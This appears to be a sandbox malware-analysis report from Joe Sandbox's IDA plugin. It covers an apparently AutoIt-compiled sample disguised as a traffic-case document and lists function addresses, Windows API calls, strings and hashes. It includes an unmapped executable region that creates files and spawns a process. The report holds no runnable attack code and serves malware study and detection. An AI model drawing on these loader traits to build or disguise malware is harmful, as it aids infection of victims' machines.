Part of subcall function 00BB4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C762F8,?,00BB37C0,?), ref: 00BB4882

Part of subcall function 00BD074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BB72C5), ref: 00BD0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BB7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BEECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BEED32
RegCloseKey.ADVAPI32(?), ref: 00BEED70
_wcscat.LIBCMT ref: 00BEEDC9

Strings

\, xrefs: 00BEEDEC
Software\AutoIt v3\AutoIt, xrefs: 00BB72FE
\Include\, xrefs: 00BB72C5
Include, xrefs: 00BEECE8, 00BEED29

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 4f5cfe287e1d3be6be6381d1dcff38b8dede0e151dae8cd1428070f5c6b0aafa
Instruction ID: 260551c95860708a188c0d82d069259eb8a1d4484ab34a1718c204183b714dd2
Opcode Fuzzy Hash: 4f5cfe287e1d3be6be6381d1dcff38b8dede0e151dae8cd1428070f5c6b0aafa
Instruction Fuzzy Hash: EA714C714083459BC714EF25DC81AAFBBE8FF94740F404A6EF469932A1EB70D989CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3A62
LoadCursorW.USER32(00000000,00007F00), ref: 00BB3A71
LoadIconW.USER32(00000063), ref: 00BB3A88
LoadIconW.USER32(000000A4), ref: 00BB3A9A
LoadIconW.USER32(000000A2), ref: 00BB3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB3AD2
RegisterClassExW.USER32(?), ref: 00BB3B28

Part of subcall function 00BB3041: GetSysColorBrush.USER32(0000000F), ref: 00BB3074
Part of subcall function 00BB3041: RegisterClassExW.USER32(00000030), ref: 00BB309E
Part of subcall function 00BB3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB30AF
Part of subcall function 00BB3041: InitCommonControlsEx.COMCTL32(?), ref: 00BB30CC
Part of subcall function 00BB3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB30DC
Part of subcall function 00BB3041: LoadIconW.USER32(000000A9), ref: 00BB30F2
Part of subcall function 00BB3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB3101

Strings

#, xrefs: 00BB3B0D
AutoIt v3, xrefs: 00BB3B17
0, xrefs: 00BB3B06

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5fa299cfa5bcbc2c422c2c05dfec745f87ab61d88bdfc7cf8c5a67cd5d4c7760
Instruction ID: a1719e105d14c07a4b6a80c9f70e3f4b3fe06e05ae1dde65c11de54631a733e3
Opcode Fuzzy Hash: 5fa299cfa5bcbc2c422c2c05dfec745f87ab61d88bdfc7cf8c5a67cd5d4c7760
Instruction Fuzzy Hash: 9F216B71D10308AFEB509FA4EC49B9DBFF5FB08714F00456AF608A62A2D7B65694CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00BB36D2
KillTimer.USER32(?,00000001), ref: 00BB36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB372A
CreatePopupMenu.USER32 ref: 00BB373E
PostQuitMessage.USER32(00000000), ref: 00BB375F

Strings

TaskbarCreated, xrefs: 00BB3725

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 82cb754840bb267f688f0302ce5aa7fb7e9e471a2d3e891d69b1bcf5a8461d9f
Instruction ID: 02761fd29b960d4be374318a3d008624a4eae8700915e2101d987b0f7ded1b90
Opcode Fuzzy Hash: 82cb754840bb267f688f0302ce5aa7fb7e9e471a2d3e891d69b1bcf5a8461d9f
Instruction Fuzzy Hash: FE4125B1214A05ABDF145F29DC49FFE37D4EB01B00F1405A9F907D62A2CFE49E909762

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00BB37C0
/AutoIt3ExecuteLine, xrefs: 00BB38B9
/AutoIt3OutputDebug, xrefs: 00BB38A4
CMDLINE, xrefs: 00BB3834
/ErrorStdOut, xrefs: 00BB388F
/AutoIt3ExecuteScript, xrefs: 00BB38CE
CMDLINERAW, xrefs: 00BB380D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 2c4ffa5dcdfec1f535b992a2f4b10c14a6dc468ea66b1aeea23b35a36e29c862
Instruction ID: 6fc91e0e12905796205cb5f0e076480dfab3b5ff5717c4e3eb7a2c614b3f895f
Opcode Fuzzy Hash: 2c4ffa5dcdfec1f535b992a2f4b10c14a6dc468ea66b1aeea23b35a36e29c862
Instruction Fuzzy Hash: 62A14F718106299BCB04EFA4CC95AFEB7F8BF14700F4404AAE416B7192DFB59A09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01510920 Relevance: 10.7, APIs: 7, Instructions: 185
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01510965

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction ID: 574f9d863b0210462dccdba0fc4f949c71104dcfe021360358a9a8a603c7d573
Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction Fuzzy Hash: 1171ED75A10208EBEF25DFA4CC95FEEB7B5BF48700F108558F605AF284DA749A84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BB39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB3A36
ShowWindow.USER32(00000000,?,?), ref: 00BB3A4A
ShowWindow.USER32(00000000,?,?), ref: 00BB3A53

Strings

edit, xrefs: 00BB3A30
AutoIt v3, xrefs: 00BB3A0D, 00BB3A12, 00BB3A13

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 8286ec38d61ba1d9d03615c2e4d1c97d5207ee5c791bdc0ada2eb2743d09c342
Instruction ID: 6ccd307fbef83e33deef7588e2bb5abf3769605cdfb0ef780ac61492628ceee4
Opcode Fuzzy Hash: 8286ec38d61ba1d9d03615c2e4d1c97d5207ee5c791bdc0ada2eb2743d09c342
Instruction Fuzzy Hash: 8AF03A70A102907EEB7017236C09F2B3E7DE7C7F50F01002EBA08A2271C6A50881DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BED5EC

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

_memset.LIBCMT ref: 00BB418D
_wcscpy.LIBCMT ref: 00BB41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BB41F1

Strings

Line: , xrefs: 00BED615

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: fed720554b2bce656d9965de6f12e38fccbc687a1aae39b3be074634cac3f92d
Instruction ID: d0ae5fd912889eb1787293eb8d3d49702240290fccc18e16001f3dbd5cf74624
Opcode Fuzzy Hash: fed720554b2bce656d9965de6f12e38fccbc687a1aae39b3be074634cac3f92d
Instruction Fuzzy Hash: 813192714483056BD761EB64DC46BEF77E8AF54300F10499EF589921A2EFB09688CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00BD564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00BD56AB
_memcpy_s.LIBCMT ref: 00BD571D
__read_nolock.LIBCMT ref: 00BD577B
__filbuf.LIBCMT ref: 00BD579E
_memset.LIBCMT ref: 00BD57E2

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: d78c13af7a8aeb7a2b7a06b56dd0160e6e88ffdbc0277a96dea5a093c7385692
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 82518174A01B05DBDB349F69888066EFBE5EF40320F3486ABE825963D0F770DD509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BB4F6F

_free.LIBCMT ref: 00BEE68C
_free.LIBCMT ref: 00BEE6D3

Part of subcall function 00BB6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BB6D0D

Strings

Bad directive syntax error, xrefs: 00BEE6BB
>>>AUTOIT SCRIPT<<<, xrefs: 00BEE462

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: f784623d56465de7baffe75122144c4d6bfdfceafd729b0e119d074b72949a5c
Instruction ID: 265edc5c47a35ecd905d822bc5941cd4654e05f0e709bf0ecff46363da2d9d2d
Opcode Fuzzy Hash: f784623d56465de7baffe75122144c4d6bfdfceafd729b0e119d074b72949a5c
Instruction Fuzzy Hash: B1918D71910259AFCF14EFA5C8919EDB7F4FF19300F1044AAF826AB2A1EB70D905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01512410 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01512300: Sleep.KERNELBASE(000001F4), ref: 01512311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015125A2

Strings

NSNDICWP030W8ZYROM44AQBW, xrefs: 0151262B, 0151262E

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateFileSleep
String ID: NSNDICWP030W8ZYROM44AQBW
API String ID: 2694422964-1800987701
Opcode ID: 74c46484a24bfed05aa3e15fa9e617a93663fd85c71bb4c3df6e20740fcc63b2
Instruction ID: 73e3068e47231fcb3588dda04b2f1cc7aa96a408673eb5f5e77a0e854374dc8f
Opcode Fuzzy Hash: 74c46484a24bfed05aa3e15fa9e617a93663fd85c71bb4c3df6e20740fcc63b2
Instruction Fuzzy Hash: 3D71A230D14289DBEF11DBB4D8547EEBBB5AF54300F104199E208BB2C4D7BA1B45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00BB35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BB35A1,SwapMouseButtons,00000004,?), ref: 00BB35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BB35A1,SwapMouseButtons,00000004,?,?,?,?,00BB2754), ref: 00BB35F5
RegCloseKey.KERNELBASE(00000000,?,?,00BB35A1,SwapMouseButtons,00000004,?,?,?,?,00BB2754), ref: 00BB3617

Strings

Control Panel\Mouse, xrefs: 00BB35D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3b7c49b9879153151c41896596e2ede032ff9b7fd9542a30db0fe59d43462180
Instruction ID: 4f08f120562df1f90eeab19d49a4bd9df0850602f9bf3acf84ae8be5de751f59
Opcode Fuzzy Hash: 3b7c49b9879153151c41896596e2ede032ff9b7fd9542a30db0fe59d43462180
Instruction Fuzzy Hash: E61148B5914608BFDB208F68DC80AFEB7F8EF04B40F0054A9E806D7210D2B19E4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C197E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00BB5045: _fseek.LIBCMT ref: 00BB505D

Part of subcall function 00C199BE: _wcscmp.LIBCMT ref: 00C19AAE
Part of subcall function 00C199BE: _wcscmp.LIBCMT ref: 00C19AC1

_free.LIBCMT ref: 00C1992C
_free.LIBCMT ref: 00C19933
_free.LIBCMT ref: 00C1999E

Part of subcall function 00BD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD9C64), ref: 00BD2FA9
Part of subcall function 00BD2F95: GetLastError.KERNEL32(00000000,?,00BD9C64), ref: 00BD2FBB

_free.LIBCMT ref: 00C199A6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction ID: 95d2f1ff7660332507bcc95252affad80ad35ffba3180e08f3d636586ec4a1f3
Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction Fuzzy Hash: EC515BB1D04258AFDF249F64DC81AEEBBB9EF49310F1004AEB609A7341DB715A80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00BD493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD49D0
__flush.LIBCMT ref: 00BD49F0
__write.LIBCMT ref: 00BD4A23
__flsbuf.LIBCMT ref: 00BD4A51

Part of subcall function 00BD8D68: __getptd_noexit.LIBCMT ref: 00BD8D68

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 9bfdbad80fe156ef3c6147ee7ef59ef0e0c9c579d69a960efce4f1221ba8fce7
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: FF41A3756406069FDF288FAAC8909AFFBE6EF80360B2485BFE85587750F7749D408B44

Uniqueness

Uniqueness Score: -1.00%

Function 00BB73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BEEE62
GetOpenFileNameW.COMDLG32(?), ref: 00BEEEAC

Part of subcall function 00BB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB48A1,?,?,00BB37C0,?), ref: 00BB48CE

Part of subcall function 00BD09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BD09F4

Strings

X, xrefs: 00BEEE7A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 251e0df49f76508ff3ca407d2c0b8472660442eca49e4215c09238b58482ed65
Instruction ID: 18ad9e2185071a792d3d020a9bdec43faf1f128990c17b2dbc9984be9f934033
Opcode Fuzzy Hash: 251e0df49f76508ff3ca407d2c0b8472660442eca49e4215c09238b58482ed65
Instruction Fuzzy Hash: 552196719102989BCF55DF98C8457EE7BFD9F49710F00409AE408E7341DBF499898BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C1901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C19036
__fread_nolock.LIBCMT ref: 00C1904B

Strings

EA06, xrefs: 00C1907D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: e1278ac6b8166c44d4c379620d992068dbe0380750d903e00ee1446a5a0008bc
Instruction ID: dd1106fcf737bf53433eff7d65cbd69393ea996a4956fc7e9b21d45e56825489
Opcode Fuzzy Hash: e1278ac6b8166c44d4c379620d992068dbe0380750d903e00ee1446a5a0008bc
Instruction Fuzzy Hash: 0101B971904258BEDB28D6A8CC56EFEBBF8DB15301F00459BF552D2281E575A6049B60

Uniqueness

Uniqueness Score: -1.00%

Function 01511060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 015110A5
ExitProcess.KERNEL32(00000000), ref: 015110C4

Strings

D, xrefs: 01511071

Memory Dump Source

Source File: 00000000.00000002.3289815690.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction ID: 5e077407e9c5ef26c79f7b76a51470269da0c63c6009d3b8bd2822274de5ee77
Opcode Fuzzy Hash: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction Fuzzy Hash: 2CF0E17194024DABDB60DFE0CC49FEE77BCBF44701F108908BB099E184DE7495088B61

Uniqueness

Uniqueness Score: -1.00%

